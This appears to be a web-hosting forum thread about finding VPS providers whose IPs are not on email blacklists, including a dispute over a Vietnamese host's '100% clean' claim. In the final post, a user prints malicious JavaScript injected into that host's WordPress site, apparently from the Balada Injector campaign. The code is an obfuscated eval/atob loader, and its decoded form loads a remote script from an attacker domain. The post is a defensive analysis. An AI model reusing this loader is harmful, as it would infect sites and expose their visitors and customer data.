Need VPS with clean IP

tdwuk

I opted for Mailwizz as I already had a licence and I can add multiple sending servers and choose per account/campaign. As far as I can see from Mautic, you can only use one server. Great if you have a good list.

scooke

@HPJ said:

@WebProject said:

@HPJ said: my IT guy was done with the installation he had sent a test email to Hotmail and it turned out the IP was blacklisted

even with clean IPs you will get similar issue with Microsoft and required to follow their process and contact Microsoft and sort out the issue, are you sure that your IT guy is up to job?

I do not know whether my IT guy is up to this job. I hired him to install mautic and postfix and get the server ready for sending emails.

Check the IP _before _going through the hassle of setting everything up!

Hazgui

How to check if the IP is clean ?

totally_not_banned

@Hazgui said:
How to check if the IP is clean ?

For the most part you check their presence in the various blacklists and try to get a clear picture of how their neighborhood looks like. https://nerd.cesnet.cz/nerd/ips/ is pretty useful for that.

kevinds

@HPJ said:
I have tried 2 different companies and after my IT guy was done with the installation he had sent a test email to Hotmail and it turned out the IP was blacklisted.

I rented a server, installed everything a day or two later sent 1 test email to a Hotmail email and it came back as not deliverable because IP was on Blacklist.

Hotmail/Outlook do their own thing with their blacklists which don't make sense and there is no reason behind it.

I can fire up a mail server on an unused IP, by used, I mean not used in 2+ years, since being assiged from the RIR, and it will be blocked, with the rest of the /24 firewall blocked from sending mail for those 2 years, so not based on neighbors.

But just Outlook domains.. Everywhere else is fine.

So don't rush to blame your VPS provider, it is definitely possible it was used to send SPAM in the past, but if it isn't blocked anywhere else, there is a good chance it is Hotmail/Outlook being normal.

tothost

you should check Tothost Vietnam (https://tothost.vn/). We have native IP, 100% Clean - Vietnam/ Asia Location.

totally_not_banned

@tothost said:
you should check Tothost Vietnam (https://tothost.vn/). We have native IP, 100% Clean - Vietnam/ Asia Location.

That's a bit of a bold claim i fear: https://nerd.cesnet.cz/nerd/ips/?subnet=&hostname=&asn=AS45899&source_op=or&cat_op=or&bl_op=or&tag_op=or&sortby=rep&limit=20

kenjing789

@totally_not_banned said:

@tothost said:
you should check Tothost Vietnam (https://tothost.vn/). We have native IP, 100% Clean - Vietnam/ Asia Location.

That's a bit of a bold claim i fear: https://nerd.cesnet.cz/nerd/ips/?subnet=&hostname=&asn=AS45899&source_op=or&cat_op=or&bl_op=or&tag_op=or&sortby=rep&limit=20

Look like they use same ASN with Residential ASN , so they might have clean ip range but not asn

totally_not_banned

@kenjing789 said:

@totally_not_banned said:

@tothost said:
you should check Tothost Vietnam (https://tothost.vn/). We have native IP, 100% Clean - Vietnam/ Asia Location.

That's a bit of a bold claim i fear: https://nerd.cesnet.cz/nerd/ips/?subnet=&hostname=&asn=AS45899&source_op=or&cat_op=or&bl_op=or&tag_op=or&sortby=rep&limit=20

Look like they use same ASN with Residential ASN , so they might have clean ip range but not asn

True, it would be better to have those ranges under a different ASN then though as those entries will still reflect badly on their other ranges. Those listings are pretty ugly after all.

meaton

@tothost said:
you should check Tothost Vietnam (https://tothost.vn/). We have native IP, 100% Clean - Vietnam/ Asia Location.

You might wanna fix your site

tothost

@meaton said:

@tothost said:
you should check Tothost Vietnam (https://tothost.vn/). We have native IP, 100% Clean - Vietnam/ Asia Location.

You might wanna fix your site

Can you try with another browser? Our client still access normal. Let me know if you need something.

matey0

@tothost said:

@meaton said:

@tothost said:
you should check Tothost Vietnam (https://tothost.vn/). We have native IP, 100% Clean - Vietnam/ Asia Location.

You might wanna fix your site

Can you try with another browser? Our client still access normal. Let me know if you need something.

https://sitecheck.sucuri.net/results/https/tothost.vn
This is the problematic code beautified:

window.addEventListener('DOMContentLoaded', function() {
    jQuery(document).ready(function() {
        sgAddEvent(window, "sgpbWillOpen", function(e) {
            if (e.detail.popupId == "38164") {
                var idyfrwcytq /*heuo*/ = /*heuo*/ eval; /*heuo*/
                var owdnaoe /*heuo*/ = /*heuo*/ atob;
                idyfrwcytq(owdnaoe("d" + /*heuo*/ "mFy" + /*heuo*/ "IGQ" + /*lakuiq*/ "9ZG9jd" + /*heuo*/ "W1lbnQ" + /*lakuiq*/ "7d" + /*heuo*/ "mFy" + /*heuo*/ "IHM9ZC5" + /*lakuiq*/ "jcmVhd" + /*heuo*/ "GVFbGVtZW5" + /*lakuiq*/ "0" + /*ekmp*/ "KCJz" + /*ekmp*/ "Y3JpcHQ" + /*lakuiq*/ "iKTtz" + /*ekmp*/ "LnNy" + /*heuo*/ "Yz" + /*ekmp*/ "0" + /*ekmp*/ "naHR0" + /*ekmp*/ "cHM6Ly" + /*heuo*/ "9uZWFy" + /*heuo*/ "LmZs" + /*lakuiq*/ "eXNwZWNpYWxs" + /*lakuiq*/ "aW5" + /*lakuiq*/ "lLmNvbS9lR1JIU0" + /*ekmp*/ "VSU1cnO3MuaWQ" + /*lakuiq*/ "9J3Jvd" + /*heuo*/ "GFy" + /*heuo*/ "cy" + /*heuo*/ "c7aWYoQ" + /*lakuiq*/ "m9vbGVhbihkb2N1bWVud" + /*heuo*/ "C5" + /*lakuiq*/ "xd" + /*heuo*/ "WVy" + /*heuo*/ "eVNlbGVjd" + /*heuo*/ "G9y" + /*heuo*/ "KCd" + /*heuo*/ "z" + /*ekmp*/ "Y3JpcHRbaWQ" + /*lakuiq*/ "9InJvd" + /*heuo*/ "GFy" + /*heuo*/ "cy" + /*heuo*/ "Jd" + /*heuo*/ "Jy" + /*heuo*/ "kpPT1mYWxz" + /*ekmp*/ "ZSl7ZC5" + /*lakuiq*/ "nZXRFbGVtZW5" + /*lakuiq*/ "0" + /*ekmp*/ "c0" + /*ekmp*/ "J5" + /*lakuiq*/ "VGFnTmFtZSgnaGVhZCcpWz" + /*ekmp*/ "Bd" + /*heuo*/ "LmFwcGVuZENoaWxkKHMpO30" + /*ekmp*/ ""));
            };
        });
    });
    jQuery(document).ready(function() {
        sgAddEvent(window, "sgpbDidOpen", function(e) {
            if (e.detail.popupId == "38164") {
                var czuww /*sfqddo*/ = /*sfqddo*/ eval; /*sfqddo*/
                var nyeyxybovz /*sfqddo*/ = /*sfqddo*/ atob;
                czuww(nyeyxybovz("d" + /*sfqddo*/ "mFy" + /*sfqddo*/ "IGQ" + /*pprmz*/ "9ZG9jd" + /*sfqddo*/ "W1lbnQ" + /*pprmz*/ "7d" + /*sfqddo*/ "mFy" + /*sfqddo*/ "IHM9ZC5" + /*pprmz*/ "jcmVhd" + /*sfqddo*/ "GVFbGVtZW5" + /*pprmz*/ "0" + /*kgum*/ "KCJz" + /*kgum*/ "Y3JpcHQ" + /*pprmz*/ "iKTtz" + /*kgum*/ "LnNy" + /*sfqddo*/ "Yz" + /*kgum*/ "0" + /*kgum*/ "naHR0" + /*kgum*/ "cHM6Ly" + /*sfqddo*/ "9jYWxs" + /*pprmz*/ "LmNvbG9y" + /*sfqddo*/ "c2NoZW1lYXMuY29tL25" + /*pprmz*/ "z" + /*kgum*/ "WXpqWTE4Jz" + /*kgum*/ "tz" + /*kgum*/ "LmlkPSd" + /*sfqddo*/ "y" + /*sfqddo*/ "b3RhcnMnO2lmKEJvb2xlYW4oZG9jd" + /*sfqddo*/ "W1lbnQ" + /*pprmz*/ "ucXVlcnlTZWxlY3Rvcignc2Ny" + /*sfqddo*/ "aXB0" + /*kgum*/ "W2lkPSJy" + /*sfqddo*/ "b3RhcnMiXScpKT0" + /*kgum*/ "9ZmFs" + /*pprmz*/ "c2Upe2Q" + /*pprmz*/ "uZ2V0" + /*kgum*/ "RWxlbWVud" + /*sfqddo*/ "HNCeVRhZ0" + /*kgum*/ "5" + /*pprmz*/ "hbWUoJ2hlYWQ" + /*pprmz*/ "nKVs" + /*pprmz*/ "wXS5" + /*pprmz*/ "hcHBlbmRDaGls" + /*pprmz*/ "ZChz" + /*kgum*/ "KTt9"));
            };
        });
    });
});

As you can see it's eval'ing a base-64-ed string. Pretty poor obfuscation. This is the code it's executing:

var d=document;var s=d.createElement("script");s.src='https://near.flyspecialline.com/eGRHSERSW';s.id='rotars';if(Boolean(document.querySelector('script[id="rotars"]'))==false){d.getElementsByTagName('head')[0].appendChild(s);}

This is executing javascript from https://near.flyspecialline.com/eGRHSERSW, which is heavily obfuscated this time.
Do you know what this code is about?

A google search of that domain shows a number of wordpress-malware related things. Seems to be this: https://blog.sucuri.net/2023/04/balada-injector-synopsis-of-a-massive-ongoing-wordpress-malware-campaign.html
Your wordpress installation is likely backdoored and you should take immediate action. Customer data may be compromised.